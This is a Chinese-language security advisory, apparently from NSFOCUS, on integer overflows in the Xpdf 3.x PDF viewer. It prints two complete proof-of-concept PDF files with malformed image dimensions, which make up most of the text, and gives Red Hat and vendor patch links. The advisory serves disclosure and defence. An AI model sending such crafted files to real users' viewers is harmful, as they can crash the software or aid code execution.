安全研究
安全漏洞
Xpdf多个整数溢出漏洞
发布日期:2009-10-15
更新日期:2009-10-20
受影响系统:
Xpdf Xpdf 3.x不受影响系统:
Xpdf Xpdf 3.02 pl4描述:
BUGTRAQ ID: 36703
CVE(CAN) ID: CVE-2009-3603,CVE-2009-3604,CVE-2009-3606,CVE-2009-3608,CVE-2009-3609
Xpdf是便携文档格式(PDF)文件的开放源码查看器。
Xpdf的SplashBitmap::SplashBitmap()、ObjectStream::ObjectStream()、Splash::drawImage()和PSOutputDev::doImageL1Sep()函数中存在多个可能导致堆溢出的整数溢出漏洞。用户受骗打开了恶意的PDF文档就可能触发这些溢出,导致查看器崩溃或执行任意代码。
<*来源:Adam Zabrocki (pi3ki31ny@wp.pl)
链接:http://secunia.com/advisories/37053/
http://site.pi3.com.pl/adv/xpdf.txt
https://www.redhat.com/support/errata/RHSA-2009-1513.html
https://www.redhat.com/support/errata/RHSA-2009-1512.html
https://www.redhat.com/support/errata/RHSA-2009-1504.html
https://www.redhat.com/support/errata/RHSA-2009-1503.html
https://www.redhat.com/support/errata/RHSA-2009-1502.html
https://www.redhat.com/support/errata/RHSA-2009-1501.html
https://www.redhat.com/support/errata/RHSA-2009-1500.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-------------- xpdf-poc-null-pointer-dereference.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 0 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream
endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans << >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964 () g>'<K)ZW1TUhKc(%
Rpp=t5hkIT:&HH9nYhU`6Inl-6"Js0J5ePfhLZm8G)YG;4cqkJ;Rf)cZMkCEB*ZoFeK5S8`19G:#!aWM18.~>endstream
endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest
(http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b
\372\015\305\017\211\022\241\262?\243\347)]
/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF
-------------- xpdf-poc-null-pointer-dereference.pdf -------------
[2] - Integer overflow:
-------------- xpdf-poc-integer-overflow.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 1102 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream
endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans << >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964 () g>'<K)ZW1TUhKc(%
Rpp=t5hkIT:&HH9nYhU`6Inl-6"Js0J5ePfhLZm8G)YG;4cqkJ;Rf)cZMkCEB*ZoFeK5S8`19G:#!aWM18.~>endstream
endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest
(http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b
\372\015\305\017\211\022\241\262?\243\347)]
/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF
-------------- xpdf-poc-integer-overflow.pdf -------------
建议:
厂商补丁:
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:1500-01)以及相应补丁:
RHSA-2009:1500-01:Important: xpdf security update
链接:https://www.redhat.com/support/errata/RHSA-2009-1500.html
Xpdf
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.foolabs.com/xpdf/
浏览次数:2711
严重程度:0(网友投票)
绿盟科技给您安全的保障